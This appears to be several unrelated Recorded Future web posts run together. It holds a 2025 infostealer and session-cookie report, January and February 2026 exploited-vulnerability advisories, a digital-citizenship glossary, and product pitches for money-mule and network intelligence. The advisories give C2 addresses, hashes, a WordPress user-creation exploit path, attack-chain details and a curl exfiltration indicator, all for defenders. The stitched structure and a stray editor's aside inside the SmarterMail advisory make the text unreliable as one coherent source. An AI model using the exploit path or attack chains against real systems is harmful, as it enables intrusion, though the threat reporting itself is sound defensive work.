Recorded Future's Compromised Host Incident Reports surface the full scope of each device-level infection, including the malware family responsible, file paths, IP addresses, and infection timelines. This context is what separates actionable intelligence from a list of leaked passwords.

Image 1: Incident Report results in Recorded Future Identity Intelligence

What this means for security teams: A single alert should trigger a device-level incident response, not just a password reset. Understanding what else was on that machine — and what else may have been exfiltrated — is essential to containing the full extent of the exposure.

The Cookie Problem: Why MFA Isn't Enough

One of the most significant findings from 2025 is the volume of credentials that included active session cookies alongside stolen passwords. Recorded Future indexed 276 million credentials with cookies — 31% of all malware-sourced credentials — a figure that grew 30% from the first half of the year to the second half.

Session cookies allow attackers to authenticate as a user without entering a password or completing an MFA challenge. They effectively render secondary authentication controls irrelevant for as long as the session remains active.

December was the single highest month for cookie-bearing credential exposure, indexing 18% more than the next highest month (November).

CHART 3: Monthly volume of credentials with cookies, 2025 (Source: Recorded Future)

What this means for security teams: MFA enrollment is necessary but not sufficient. Organizations should monitor for session cookie theft specifically, enforce shorter session token lifespans for high-risk applications, and treat any credential exposure from an infostealer log as a potential authentication bypass — not just a password reset trigger.

The Infostealer Ecosystem: How the Malware Landscape Shifted in 2025

LummaC2: The Year's Dominant Threat

LummaStealer emerged as the most widely deployed infostealer of 2025. Operating under a malware-as-a-service model since late 2022, it matured significantly over the past year, targeting Windows systems to harvest browser credentials, session cookies, cryptocurrency wallets, and two-factor authentication tokens.

Its distribution relied heavily on social engineering — fake software downloads and "ClickFix" techniques that trick users into executing malicious commands disguised as CAPTCHA challenges. Recent campaigns used CastleLoader for delivery, running obfuscated payloads in memory to evade detection.

In May 2025, a coordinated law enforcement action neutralized more than 2,300 LummaC2 command-and-control domains. The disruption was significant — but not fatal. LummaStealer operators migrated to bulletproof hosting services and employed sophisticated sandbox evasion techniques, including trigonometric analysis of mouse movements to avoid automated detection environments. Activity continued under private, select-affiliate operations through the remainder of the year.

How the Rest of the Ecosystem Responded

The 2025 infostealer landscape was shaped as much by law enforcement disruption as by attacker innovation. Each takedown created a vacuum that other malware families quickly filled.

Early 2025: The late-2024 law enforcement actions against RedLine and META pushed users toward emerging MaaS alternatives, consolidating volume around LummaC2 and accelerating its dominance through Q2.

Mid-2025: Following the LummaC2 disruption in May, established families — Rhadamanthys, Vidar, and StealC — absorbed the displaced activity. Rhadamanthys led through the summer until its own infrastructure was taken down by law enforcement in November 2025. Vidar stepped into the lead position thereafter.

Rebranding as a survival strategy: Disruption prompted reinvention. StealC relaunched as StealC v2. Vidar operators attempted a similar rebrand. These moves reflect a deliberate effort by malware developers to obscure continuity and frustrate attribution.

macOS: Atomic macOS Stealer (AMOS) dominated the macOS market through most of 2025, disappearing in October before returning in February 2026. MacSync (formerly Mac.C) emerged as the primary commodity macOS infostealer by year end.

Private operations grew: Increased law enforcement pressure on publicly accessible MaaS tools pushed sophisticated threat actors toward private infostealers with restricted affiliate access. Acreed (also known as ACR Stealer) and Odyssey Stealer represented the most significant private-operation families of 2025. Private Lumma operations also continued post-disruption.

What this means for security teams: Malware family names change. Takedowns create temporary disruption, not permanent resolution. Organizations that track exposure by malware family rather than only by leaked credential volume will be better positioned to understand the true source and scope of each incident.

Recommendations for Security Teams

The 2025 data points to four areas where security teams can meaningfully reduce their exposure to credential-based attacks.

1. Extend monitoring to personal devices. The majority of infostealer infections occur on personal devices used to access corporate systems — a risk that endpoint detection tools and traditional perimeter controls cannot address. Monitoring infostealer malware logs directly provides visibility into these exposures before they are weaponized.

One large automotive parts distributor found that Recorded Future surfaced stolen credentials tied to an employee's personal device — an exposure their existing tools had no visibility into and would likely never have caught.

2. Treat session cookie exposure as a critical-severity event. With 276 million credentials carrying active cookies in 2025, any infostealer-sourced credential exposure should trigger immediate session invalidation in addition to a password reset. MFA bypass via stolen cookies is not a theoretical threat — it is an observed, frequent attack pattern.

3. Automate response workflows to close the detection-to-remediation gap. The data shows that most credentials are indexed within days of theft. Organizations that have pre-built response playbooks — automatically checking Active Directory, clearing sessions, forcing resets, and notifying managers — respond in minutes rather than hours.

"We created a custom SOAR playbook using the Identity Intelligence module. This playbook takes the information of compromised corporate user accounts, runs an Active Directory check for the credentials, clears user sessions and resets the password if the account is found to be compromised. It also notifies the user's manager for email response. To date, we have processed over 330 different identity alerts. " — Bryan Cassidy, Lead Cyber Defense Engineer, 7-Eleven (UserEvidence)

4. Monitor your entire domain footprint — including subsidiaries and third parties. Some of the most consequential exposures in 2025 involved obscure subsidiaries and supply chain partners, not core corporate domains. Attackers do not limit themselves to obvious targets. Security teams shouldn't limit their monitoring to obvious domains either.

One large international financial services firm detected an infostealer on a third-party service provider's machine through Recorded Future — surfacing a supply chain exposure that would have been invisible through traditional monitoring alone.

The Recorded Future Advantage: Detection Speed – From Exfiltration to Alert in Hours

The gap between when credentials are stolen and when a security team finds out is where breaches happen. Most organizations discover compromised credentials days or weeks after the fact — through a public breach disclosure, a tip from law enforcement, or an incident that's already underway.

Recorded Future closes that gap. In 2025, 36.4% of all indexed credentials were detected within 24 hours of exfiltration, and 52.9% within one week. By the time stolen credentials are being traded or weaponized, Recorded Future customers have already been alerted.

Table 2: Exfiltration freshness breakdown (Source: Recorded Future)

Speed matters because attackers move fast. Infostealer logs are often listed for sale within hours of collection. Every day between exfiltration and detection is a day an attacker may already have access. The 15.3% of credentials not detected within a month illustrate what happens when that window stays open — extended attacker dwell time, lateral movement, and incidents that escalate into major breaches.

For Recorded Future customers, early detection is only half the equation. Pre-built integrations with Okta, Microsoft Entra ID, and SOAR platforms like XSOAR mean that when a credential alert fires, automated workflows can clear sessions, force password resets, and notify managers — without waiting for an analyst to pick up the ticket.

A large international financial services firm's Team Lead described a recent credential leak: identified and escalated in under 24 hours, triggering immediate automated remediation — exactly the outcome their team had built toward.

Appendix: Notable Passwords from 2025 Credential Exposures

The following passwords appeared most frequently across credentials indexed by Recorded Future in 2025. Their prevalence reflects the continued gap between password policies and actual user behavior — and the reason why credential monitoring cannot rely on password complexity alone as a proxy for risk.

About This Report

This report is based on data indexed by Recorded Future's Identity Intelligence Module across the full calendar year 2025. Recorded Future monitors credentials across open web, dark web, paste sites, Telegram channels, and infostealer malware logs sourced from 30+ malware families. All credential data can be processed and analyzed without storing plaintext passwords in customer-facing systems.

Find out What’s Already Exposed in Your Environment

The data in this report reflects the broader threat landscape. The question is how much of it applies to your organization specifically.

Recorded Future's complimentary Identity Exposure Assessment pulls directly from the Recorded Future Intelligence Graph to show you the volume, recency, and severity of your organization's credential exposure over the past year — including compromised employee credentials, infostealer-sourced data, and how your exposure has trended over time.

There's no commitment required. Just a clear picture of where your organization stands.

Get your complimentary Identity Exposure Assessment →

What security teams need to know:

• Microsoft dominates: Six of 13 vulnerabilities affected Microsoft products, accounting for 46% of February's findings; all were added to CISA's KEV catalog on the same day
• Supply-chain attack on Notepad++: Lotus Blossom, a suspected China state-sponsored threat actor, exploited CVE-2025-15556 to hijack Notepad++'s update channel and deliver a Cobalt Strike Beacon and the Chrysalis backdoor
• APT28 exploits MSHTML flaw: The Russian state-sponsored group leveraged CVE-2026-21513 via malicious Windows Shortcut files for multi-stage payload delivery
• Public exploits available: Four of 13 vulnerabilities have publicly available proof-of-concept code; an alleged exploit for a fifth is being advertised for sale

Bottom line: Despite a 43% drop in volume, February's vulnerabilities include named threat actor exploitation and five RCE-enabling flaws, making prioritized, intelligence-driven remediation as important as ever.

Quick Reference: February 2026 Vulnerability Table

All 13 vulnerabilities below were actively exploited in February 2026.

Table 1: List of vulnerabilities that were actively exploited in February based on Recorded Future data. *An alleged exploit for CVE-2026-21533 is being advertised for sale across Github. Recorded Future Triage was used to browse the website advertising the exploit, which can be viewed here via the Replay Monitor. (Source: Recorded Future)

Key Trends: February 2026

Vendors Most Affected

• Microsoft led with six vulnerabilities across Windows, Windows Server, Office, and Microsoft 365 products
• BeyondTrust faced a critical OS command injection flaw in Remote Support (RS) versions 25.3.1 and earlier, and Privileged Remote Access (PRA) versions 24.3.4 and earlier
• Cisco saw active exploitation of an authentication bypass in Catalyst SD-WAN infrastructure
• Additional affected vendors: Notepad++, Apple, Soliton Systems K.K., Google, and Dell

Most Common Weakness Types

• CWE-78 – OS Command Injection (tied for most common)
• CWE-693 – Protection Mechanism Failure (tied for most common)
• CWE-476 – NULL Pointer Dereference
• CWE-843 – Type Confusion
• CWE-807 – Reliance on Untrusted Inputs in a Security Decision

Exploitation Activity

Vulnerabilities associated with malware campaigns:

• Lotus Blossom (suspected China state-sponsored) exploited CVE-2025-15556 to hijack Notepad++ update traffic between June and December 2025. The campaign rotated C2 servers across three attack chains to deliver a Metasploit loader, Cobalt Strike Beacon, and a custom backdoor called Chrysalis.
• APT28 (Russian state-sponsored) exploited CVE-2026-21513 using malicious Windows Shortcut (.lnk) files with embedded HTML payloads for multi-stage payload delivery, with observed network communication to infrastructure associated with the threat group.
• UNC6201 (suspected China-nexus) exploited CVE-2026-22769 to compromise Dell RecoverPoint for VMs appliances, deploying the SLAYSTYLE web shell, BRICKSTORM backdoor, and GRIMBOLT, a C#-based backdoor with native AOT compilation to complicate detection.

Long-running exploitation activity:

• UAT-8616 exploited CVE-2026-20127, chaining it with CVE-2022-20775 to achieve root-level access on Cisco Catalyst SD-WAN systems, with Cisco Talos attributing the activity to a sophisticated threat actor and assessing that the activity dates back to at least 2023.

Priority Alert: Active Exploitation

These vulnerabilities demand immediate attention due to confirmed exploitation in the wild.

CVE-2025-15556 | Notepad++

Risk Score: 99 (Very Critical) | CISA KEV: Added February 12, 2026

Why this matters: Lotus Blossom exploited this flaw to replace legitimate Notepad++ update packages with malicious installers, deploying Cobalt Strike and the Chrysalis backdoor to targeted users over a six-month period. The vulnerability affects the WinGUp updater used by Notepad++ versions prior to 8.8.9, which fails to cryptographically verify downloaded update metadata and installers.

Affected versions: Notepad++ versions prior to 8.8.9 (version 8.9.1 recommended)

Immediate actions:

• Update to Notepad++ version 8.9.1, released January 26, 2026
• Hunt for the malicious update.exe sample (SHA256: 4d4aec6120290e21778c1b14c94aa6ebff3b0816fb6798495dc2eae165db4566) in your environment
• Monitor for GUP.exe spawning unexpected child processes
• Review network connections for traffic to 45[.]76[.]155[.]202, 45[.]77[.]31[.]210, 45[.]32[.]144[.]255, or 95[.]179[.]213[.]0
• Check for directories named ProShow under %APPDATA% or unexpected files in %APPDATA%\Adobe\Scripts\
• Block or alert on curl.exe uploading files to temp[.]sh

Known C2 infrastructure: 45[.]76[.]155[.]202, 45[.]77[.]31[.]210, cdncheck[.]it[.]com, safe-dns[.]it[.]com, 95[.]179[.]213[.]0

Detection resources: Insikt Group created Sigma rules to detect update.exe's execution of reconnaissance commands (whoami, tasklist, systeminfo, and netstat -ano) and curl commands for system information exfiltration, available to Recorded Future customers.

Figure 1: Risk Rules History from Vulnerability Intelligence Card® for CVE-2025-15556 in Recorded Future (Source: Recorded Future)

Authority - Authority refers to how trustworthy a source is based on who created it. If information comes from a qualified expert or a well-known organization, it's more likely to be reliable than something posted by an unknown user.

Bystander - A bystander is someone who sees harmful behavior online, like cyberbullying, but chooses not to get involved or take action.

Cookies - Cookies are small files that websites store on your device to remember information about you, like login details or browsing habits. They make websites easier to use, but they also allow service providers to track your activity.

Cyberbullying - Cyberbullying is when someone uses digital platforms to repeatedly harass, threaten, or embarrass another person. Unlike trolling, it usually targets a specific individual.

Data Breach - A data breach happens when private or sensitive information is accessed or stolen without permission, often from companies or large platforms.

Digital Citizen - A digital citizen is anyone who uses technology to interact with others online. Being a good digital citizen means using the internet responsibly, respectfully, and safely.

Digital Footprint - A digital footprint is the trail of information you leave behind online through posts, searches, and interactions. The more you share, the greater your exposure to privacy issues or misuse of personal information. Also, once something is online, it can be very difficult to remove.

Digital Identity Theft - Digital identity theft occurs when someone steals your personal information, like passwords or account details, to pretend to be you or access your accounts.

Digital Divide - The digital divide refers to the gap between people who have access to modern technology and the internet and those who do not.

Encryption - Encryption is a method of protecting data by turning it into a coded format that only authorized users can read. It helps keep sensitive information secure.

Firewall - A firewall is a security system that monitors and controls incoming and outgoing network traffic, blocking anything that looks suspicious or harmful.

Imaginary Audience - The imaginary audience is the feeling that people are constantly watching and judging you. Social media can make this feeling stronger by showing likes, views, and comments.

Invisible Audience - The invisible audience refers to the unknown people who may see your online content, including strangers, future employers, or others outside your immediate circle. It pays to assess your security blind spots because you may not realize who is viewing your posts.

Malware - Malware is any type of harmful software designed to damage devices, steal information, or disrupt normal operations. It is often installed as part of a package or application that otherwise appears innocent.

Password Hygiene - Password hygiene refers to the practice of creating strong, unique passwords and keeping them secure instead of reusing the same one across multiple accounts.

Phishing - Phishing is a scam where attackers pretend to be a trusted source to trick you into giving away personal information, often through fake emails, texts, or websites.

Public Wi-Fi Risk - Public Wi-Fi risk refers to the potential dangers of using unsecured networks, where hackers may be able to intercept your data.

Reliability - Reliability refers to whether information is accurate and dependable. Just because something looks professional online doesn't mean it's true.

Social Comparison - Social comparison is the act of comparing your life to what you see online. Since people often share only their best moments, it can create unrealistic expectations.

Targeted Advertising - Targeted advertising uses your online behavior, location, and personal data to show ads that are specifically tailored to you.

Trolling - Trolling is when someone posts deliberately annoying or provocative content online to get attention or start arguments.

Two-Factor Authentication (2FA) - Two-factor authentication is a security feature that requires a second form of verification, like a code sent to your phone, in addition to your password.

Upstander - An upstander is someone who takes action when they see harmful behavior online, such as supporting the victim or reporting the issue.

VPN (Virtual Private Network) - A VPN is a tool that creates a secure, encrypted connection to the internet, helping protect your data and privacy, especially on public networks.

Additional Resources to Learn More

• What is a Digital Citizen?
• The Global Tech Divide: How the Digital Revolution is Leaving Some of Us in the Digital Dark Ages
• What is a Digital Footprint?
• What is Digital Identity Theft?
• Research About The "Imaginary Audience"
• What is Spam, Phishing, and Malware?
• Authority and Value of Information
• Dealing with Social Comparison in the Age of Social Media
• What is Targeted Advertising?
• What Makes a Troll? The Dangers of Online Narcissism

• Latin America faces a distinct and evolving cyber threat landscape, from PIX payment fraud to ransomware hitting critical infrastructure.
• Most LATAM security teams are still reactive by necessity, and that posture is costing organizations in downtime, data, and trust.
• Recorded Future offers LATAM-specific threat intelligence, automation, and 100+ integrations to help stretched teams get ahead of attacks before they land.
• Meet us at RSA Booth N-6090 to see how intelligence-led security can transform your team's posture, from response to prevention.
• Join our upcoming webinar to learn what proactive intelligence looks like for your region.
  Understanding the Dark Covenant, Its Evolution, and Impact

Available for purchase now via the Recorded Future Platform, Money Mule Intelligence helps fraud teams identify the accounts criminals use to extract and move stolen funds—addressing a critical gap as scams increasingly become banks' most pressing fraud challenge.

The Growing Threat of Authorized Push Payment Fraud

Authorized Push Payment (APP) fraud is accelerating. In the U.S., APP fraud losses are projected to reach nearly $15B by 2028, up from $8.3B in 2024, according to Deloitte. While traditional card fraud continues to decline, APP fraud is climbing, fueled by AI-generated deepfakes, personalized scam scripts, and instant payment systems like FedNow and Zelle that move money faster than conventional fraud controls can intercept it.

Mule accounts, or money mules, are part of the critical infrastructure that makes these scams possible. They provide the bridge that converts stolen payments into untraceable cash or cryptocurrency. Without them, most APP fraud would collapse because criminals cannot risk receiving funds directly into their own accounts. By the time victims realize they've been scammed, mule accounts have already moved the money through multiple layers, typically ending in cash withdrawals or crypto conversions.

Additionally, the sophistication of mule operations is increasing. Criminal organizations now employ "mule herders" who manage hundreds of accounts at once, using AI to simulate normal transaction behavior (grocery purchases, streaming subscriptions, etc.) so accounts don't appear dormant or suspicious. This makes detection through traditional pattern analysis increasingly difficult.

Regulators are responding by shifting liability to banks, often viewing those allowing mule accounts to operate as part of the criminal infrastructure itself. For example, the UK now requires banks to reimburse scam victims and allows them to delay suspicious payments for investigation, while U.S. regulators are signaling that banks may be held liable for failing to detect mule accounts.

Detecting mule accounts is fundamentally difficult. They’re designed to blend in with legitimate activity, and traditional fraud controls can struggle to distinguish between a genuine customer payment and a scam transfer until it's too late.

CYBERA's Approach to Mule Intelligence

The challenge of detecting and disrupting mule account networks is what led CYBERA's founders to build their solution. Coming from legal practice and law enforcement, CYBERA's leadership team worked scam cases where they witnessed how recovery becomes impossible once funds move through the financial system. They realized that money mule networks represent a central vulnerability in the scam economy, one that banks had limited visibility into.

Today, CYBERA helps banks and payment networks disrupt scams at the point where funds are extracted. CYBERA's AI-powered Scam Engagement System generates intelligence on bank accounts and payment endpoints actively used by scam networks.

Unlike probabilistic risk scoring, CYBERA verifies each account, providing evidence and contextual metadata to enable proactive prevention across both internal accounts and outbound payments while minimizing false positives.

CYBERA supports two core use cases:

• On-Us Mule Detection, which helps identify mule accounts held at your institution that are already linked to confirmed scam activity. This enables early detection and disruption of high-risk accounts, reducing downstream fraud, repeat victimization, and regulatory exposure within a bank’s accountholders.
• Off-Us Screening, which screens outbound payments to external beneficiary accounts before execution, helping to prevent customers from sending funds to scammer-controlled accounts. This is particularly valuable for high-value transfers, social engineering attacks, and customer-initiated payments where traditional controls are limited.

Large financial institutions have already prevented multiple six-figure losses by embedding CYBERA’s intelligence into their transaction monitoring workflows. CYBERA has also been accepted as a member of the Mastercard Start Path program, making it the first Recorded Future partner to achieve this distinction and further validating its role in the payments ecosystem.

How Money Mule Intelligence Expands Payment Fraud Intelligence

Payment Fraud Intelligence (PFI) correlates the widest set of disparate, pre-monetization indicators of fraud to help teams act before their customers are impacted. Money Mule Intelligence extends that capability, giving fraud teams the verified intelligence needed to make high-confidence decisions that disrupt scams by flagging accounts that have been confirmed as mule infrastructure through direct investigation. Together, they provide coverage from initial compromise through attempted cash-out, helping fraud teams prevent losses at multiple intervention points.

As regulators increasingly expect banks to prevent scam-enabled transfers, Money Mule Intelligence provides the verified data needed to comply with emerging reimbursement requirements while reducing the operational burden of post-incident investigation and remediation.

PFI users that purchase this capability, can now act on both sides of the transaction—compromised payment instruments and scam-linked receiving accounts—with evidence-backed intelligence that minimizes false positives and aligns with the industry's shift toward proactive fraud prevention.

What security teams need to know:

• APT28's Operation Neusploit: Russian state-sponsored actors exploited CVE-2026-21509 (Microsoft Office) via weaponized RTF files, delivering MiniDoor, PixyNetLoader, and Covenant Grunt implants
• Microsoft and SmarterTools lead concerns: These vendors accounted for 30% of January's vulnerabilities, with multiple critical authentication bypass and RCE flaws
• Public exploits proliferate: Fourteen of the 23 vulnerabilities reported have public proof-of-concept exploit code available
• Code Injection dominates: CWE-94 (Code Injection) was the most common weakness type, followed by CWE-288 (Authentication Bypass Using an Alternate Path or Channel) and CWE-200 (Exposure of Sensitive Information to an Unauthorized Actor)

Bottom line: The slight increase masks significant threats. APT28's zero-day exploitation and multiple critical authentication bypass flaws demonstrate that threat actors continue targeting enterprise communication and management platforms for initial access and persistence.

Quick Reference Table

All 23 vulnerabilities below were actively exploited in January 2026.

Table 1: List of vulnerabilities that were actively exploited in January based on Recorded Future data (Source: Recorded Future)

Key Trends in January 2026

Affected Vendors

• Microsoft faced four critical vulnerabilities across Windows and Office products, including APT28's zero-day exploitation of CVE-2026-21509
• SmarterTools accounted for three critical vulnerabilities affecting SmarterMail, all enabling authentication bypass or RCE
• Cisco saw two critical flaws in Identity Services Engine and Unified Communications Manager
• Ivanti dealt with two pre-authentication RCE vulnerabilities in Endpoint Manager Mobile
• Additional affected vendors/projects: Fortinet, SolarWinds, Broadcom, Synacor, Versa, Hewlett Packard Enterprise, GNU, Linux, Vite, Prettier, Gogs, and Modular DS

Most Common Weakness Types

• CWE-94 – Code Injection
• CWE-288 – Authentication Bypass Using an Alternate Path or Channel
• CWE-200 – Exposure of Sensitive Information to an Unauthorized Actor

Threat Actor Activity

APT28's Operation Neusploit marked January's most sophisticated campaign:

• Exploited CVE-2026-21509 (Microsoft Office) via weaponized RTF files
• Deployed MiniDoor, a malicious Outlook VBA project designed to collect and forward victim emails to hardcoded addresses
• Deployed PixyNetLoader, which staged additional components and culminated in a Covenant Grunt implant
• Abused Filen API as a C2 bridge between the implant and actor-controlled Covenant listener

Priority Alert: Active Exploitation

These vulnerabilities demand immediate attention due to confirmed exploitation in the wild.

CVE-2026-21509 | Microsoft Office

Risk Score: 99 (Very Critical) | Active exploitation by APT28

Why this matters: Zero-day exploitation by Russian state-sponsored actors bypasses Office security features, enabling delivery of email collection implants and backdoors. The vulnerability stems from reliance on untrusted inputs in security decisions, allowing unauthorized attackers to bypass OLE mitigations.

Affected versions: Microsoft 365 and Microsoft Office (versions not specified in advisory)

Immediate actions:

• Install Microsoft's out-of-band update released January 26, 2026
• Search email systems for RTF attachments with embedded malicious droppers
• Check for modifications to %appdata%\Microsoft\Outlook\VbaProject.OTM
• Review registry keys: HKCU\Software\Microsoft\Office\16.0\Outlook\Security\Level, Software\Microsoft\Office\16.0\Outlook\Options\General\PONT_STRING, and Software\Microsoft\Office\16.0\Outlook\LoadMacroProviderOnBoot
• Monitor for connections to 213[.]155[.]157[.]123:443 and remote connectivity to Microsoft Office CDN endpoints
• Hunt for scheduled tasks named "OneDriveHealth" and suspicious files in %programdata%\Microsoft\OneDrive\setup\Cache\SplashScreen.png
• Block email addresses: ahmeclaw2002@outlook[.]com and ahmeclaw@proton[.]me

Figure 1: Vulnerability Intelligence Card® for CVE-2026-21509 in Recorded Future (Source: Recorded Future)

CVE-2026-23760 | SmarterTools SmarterMail

Risk Score: 99 (Very Critical) | CISA KEV: Added January 26, 2026

Why this matters: Unauthenticated attackers can reset system administrator passwords without any credentials or prior access, enabling complete administrative takeover and potential RCE through volume mount command injection.

Affected versions: SmarterTools SmarterMail prior to build 9511

Immediate actions:

• Upgrade to build 9511 or later immediately
• Review administrator account activity logs for unauthorized password resets
• Check Volume Mounts configuration for suspicious command entries (this one IS correct for SmarterMail)
• Review administrator access patterns and session logs
• Audit system for unauthorized changes made with compromised admin access

CVE-2026-1281 & CVE-2026-1340 | Ivanti Endpoint Manager Mobile

Risk Score: 99 (Very Critical) | CISA KEV: CVE-2026-1281 added January 29, 2026

Why this matters: Pre-authentication RCE vulnerabilities in EPMM enable unauthenticated attackers to execute arbitrary code by exploiting Apache RewriteMap helper scripts that pass attacker-controlled strings to Bash.

Affected versions: Ivanti EPMM 12.5.0.0 and earlier, 12.5.1.0 and earlier, 12.6.0.0 and earlier, 12.6.1.0 and earlier, and 12.7.0.0 and earlier

Immediate actions:

• Install temporary fixes via RPM packages: EPMM_RPM_12.x.0 - Security Update - 1761642-1.0.0S-5.noarch.rpm and EPMM_RPM_12.x.1 - Security Update - 1761642-1.0.0L-5.noarch.rpm
• Plan migration to EPMM 12.8.0.0 (scheduled for Q1 2026 release)
• Monitor for unusual Apache RewriteMap activity
• Review logs for crafted HTTP parameters to app store retrieval routes
• Check for unauthorized code execution attempts via RewriteRule handling

Exposure: EPMM instances accessible over corporate networks or VPN connections

Figure 2: Risk Rules History from Vulnerability Intelligence Card® for CVE-2026-1340 in Recorded Future (Source: Recorded Future)

Technical Deep Dive: Exploitation Analysis

APT28's Operation Neusploit (CVE-2026-21509)

The multi-stage attack chain: CVE-2026-21509 enables bypass of Office OLE mitigations through weaponized RTF files:

• Initial delivery – Specially-crafted RTF file exploits CVE-2026-21509
• Server-side evasion – Malicious DLL returned only for requests from targeted geographies with an expected HTTP User-Agent
• Dropper variants – Two distinct infection paths deployed based on targeting:
  • Variant 1 (MiniDoor): Writes VBA project to Outlook, modifies registry settings to enable macro execution, forwards emails to hardcoded recipient addresses
  • Variant 2 (PixyNetLoader): Creates mutex asagdugughi41, decrypts embedded payloads using rolling XOR key, establishes persistence via COM hijacking

Why this matters: APT28 demonstrates sophisticated exploitation combining zero-day vulnerabilities with anti-analysis techniques, targeting government and business users for email collection and persistent access.

Modular DS WordPress Plugin Exploitation (CVE-2026-23550 & CVE-2026-23800)

The authentication bypass chain: CVE-2026-23550 enables administrator-level access without authentication:

• Plugin treats requests as trusted based on request-supplied indicators rather than cryptographic verification
• /api/modular-connector/login flow grants access based on site connector enrollment state
• If no user identifier is supplied, the code selects an existing administrative user and establishes a privileged session
• CVE-2026-23800 represents the second exploitation path via REST API user creation: /?rest_route=/wp/v2/users&origin=mo&type=x

Known IoCs associated with CVE-2026-23550:

• 45[.]11[.]89[.]19
• 185[.]196[.]0[.]11
• 64[.]188[.]91[.]37

Known IoCs associated with CVE-2026-23800:

• 62[.]60[.]131[.]161
• 185[.]102[.]115[.]27
• backup[@]wordpress[.]com
• backup1[@]wordpress[.]com

Why this matters: WordPress plugin vulnerabilities enable threat actors to compromise multiple sites from a single centralized management platform, amplifying attack impact.

SmarterMail Authentication Bypass (CVE-2026-23760)

The password reset flaw: CVE-2026-23760 exposes privileged password reset to anonymous callers:

• ForceResetPassword controller attribute explicitly permits unauthenticated access
• Backend ForcePasswordReset routine branches on client-supplied IsSysAdmin boolean rather than deriving account type from server-side context
• System administrator branch performs basic checks, then sets Password directly from the supplied NewPassword
• Logic fails to validate OldPassword, lacks an authenticated session requirement, and omits authorization controls

Why this matters: Complete administrative takeover without credentials enables threat actors to deploy web shells, modify configurations, and establish persistent access to mail server infrastructure.

Detection & Remediation Resources

Nuclei Templates from Insikt Group®

Recorded Future customers can access Nuclei templates for:

• CVE-2025-8110 (Gogs) - Version detection and fingerprinting check
• CVE-2026-23760 (SmarterMail) - Authentication bypass validation

Recorded Future Product Integrations

• Vulnerability Intelligence – Prioritize based on active exploitation data, including APT28 targeting
• Attack Surface Intelligence – Discover exposed SmarterMail, Ivanti EPMM, and Modular DS assets
• Third-Party Intelligence – Monitor vendor vulnerabilities across your supply chain

January 2026 Summary

State-sponsored zero-days return. APT28's exploitation of CVE-2026-21509 demonstrates continued Russian interest in email collection and persistent access through Office vulnerabilities.

Authentication bypass dominates enterprise risk. Multiple critical flaws in SmarterMail, Modular DS, and Cisco products enable complete administrative takeover without credentials.

Legacy vulnerabilities persist. CVE-2009-0556 (Microsoft Office) highlights how threat actors continue targeting unretired systems where patching has lagged for over a decade.

Take Action

Ready to see how Recorded Future can help your team detect state-sponsored exploitation, prioritize authentication bypass fixes, and reduce enterprise attack surface? Explore our demo center for live examples, or dive deeper with Insikt Group research for technical threat intelligence.

About Insikt Group®:

Recorded Future's Insikt Group® is a team of elite analysts, linguists, and security researchers providing actionable intelligence to protect organizations worldwide. Our research combines human expertise with AI-powered analytics to deliver timely, relevant threat intelligence on emerging vulnerabilities and threat actor campaigns.

Security teams are drowning in threat intelligence feeds. Hundreds of vendors promise comprehensive coverage, real-time alerts, and actionable insights. Yet sophisticated adversaries continue to operate undetected, incidents take weeks to scope, and attribution remains elusive.

The fundamental issue isn't quality but control. Traditional network visibility solutions force passive consumption: their alerts, their priorities, their timeline. This one-size-fits-all approach assumes threats targeting financial services match those facing critical infrastructure, or that yesterday's patterns predict tomorrow's campaigns.

Network intelligence flips this model. With global visibility spanning billions of connections across 150+ sensors in 35+ countries, you can investigate what matters to your organization using your own selectors, questions, and mission requirements.

What Network Intelligence Actually Means

Effective network intelligence requires global visibility at scale: distributed sensors across dozens of countries processing billions of packets daily, generating tens of millions of network flow records. But collection methodology matters equally. Metadata-only approaches capture source and destination IPs, ports, protocols, flow counts, and timestamps without payloads or deep packet inspection. This enables operation at internet scale while better maintaining ethical boundaries and data minimization standards.

At Recorded Future, our network intelligence capabilities provide this access to such global network traffic observations for specific IP addresses of interest. Our Insikt Group uses this same infrastructure to research 500+ malware families and threat actors. Government CERTs use these capabilities to analyze adversary infrastructure at national scale.

What This Means in Practice

Consider what changes when your security operations can query global network intelligence.

Faster SOC Triage

Your team flags a suspicious IP at 2 AM. Instead of guessing whether it's noise or the start of something worse, query the network intelligence platform. See its global communication patterns instantly. Understand whether you're looking at commodity scanning or infrastructure that's been quietly staging against targets for weeks. Internet scanner detection capabilities automatically classify the behavior and reveal specific ports targeted, web requests made, and geographic distribution. Triage in minutes, not hours.

Targeted or Opportunistic? Now You'll Know

When threats hit your industry, the first question is always: are we specifically in the crosshairs, or is this spray-and-pray? Network intelligence lets you track adversary infrastructure across your sector before it reaches your perimeter. See the pattern. Understand the targeting. Brief leadership with confidence because you're no longer guessing. You're showing them the actual traffic patterns that prove whether your organization is in the crosshairs or caught in the spray.

Fraud Infrastructure Exposed

Fraud campaigns depend on infrastructure that moves fast but leaves traces. Your selectors, run against global network intelligence, can reveal the networks behind credential stuffing, account takeover, and payment fraud before the campaign fully scales.

Attribution That Actually Holds Up

Mapping adversary infrastructure is hard. Connecting it to broader campaigns and ultimate operators is harder. Network intelligence gives you the longitudinal visibility to trace how infrastructure evolves, clusters, and connects. Administrative traffic analysis reveals patterns operators use to manage C2 infrastructure. When you identify admin flows from a common source connecting to multiple C2 servers, you're mapping the operator's pattern based on observed behavior across hundreds of global vantage points. You're turning indicators into intelligence.

Integration Into Security Workflows

Network intelligence integrates directly into existing security workflows through API access to SIEMs, SOAR platforms, and custom analysis tools. When your SIEM flags suspicious traffic, automated queries reveal global context: Is this IP conducting C2 communications? Scanning your sector specifically? Connected to infrastructure from last month's campaign? Curated threat lists reduce noise from legitimate security research while enabling early blocking of targeted reconnaissance, turning your existing tools into instruments for active investigation rather than passive alerting.

When Expertise Becomes Essential

For organizations facing persistent, sophisticated adversaries, network intelligence capabilities alone aren't sufficient. The difference between having access to global network visibility and operationalizing it effectively comes down to tradecraft.

Recorded Future's Global Network Intelligence Advisory program addresses this by pairing technical capabilities with forward-deployed analysts and embedded engineers who work directly inside your SOC or intelligence fusion center. This becomes especially critical when nation-states are mapping your critical infrastructure, when advanced persistent threats are staging for long-term access, or when attribution could influence strategic decision-making. You need the ability to investigate specific questions with global visibility and the expertise to interpret what you find.

The Compliance Framework That Enables Trust

Network intelligence operates under strict ethical and legal guidelines. All use is subject to our Acceptable Use Policy and surveillance, profiling of individuals, or political targeting is prohibited. Access is invitation-only, requiring vetting and agreement to specific terms of use.

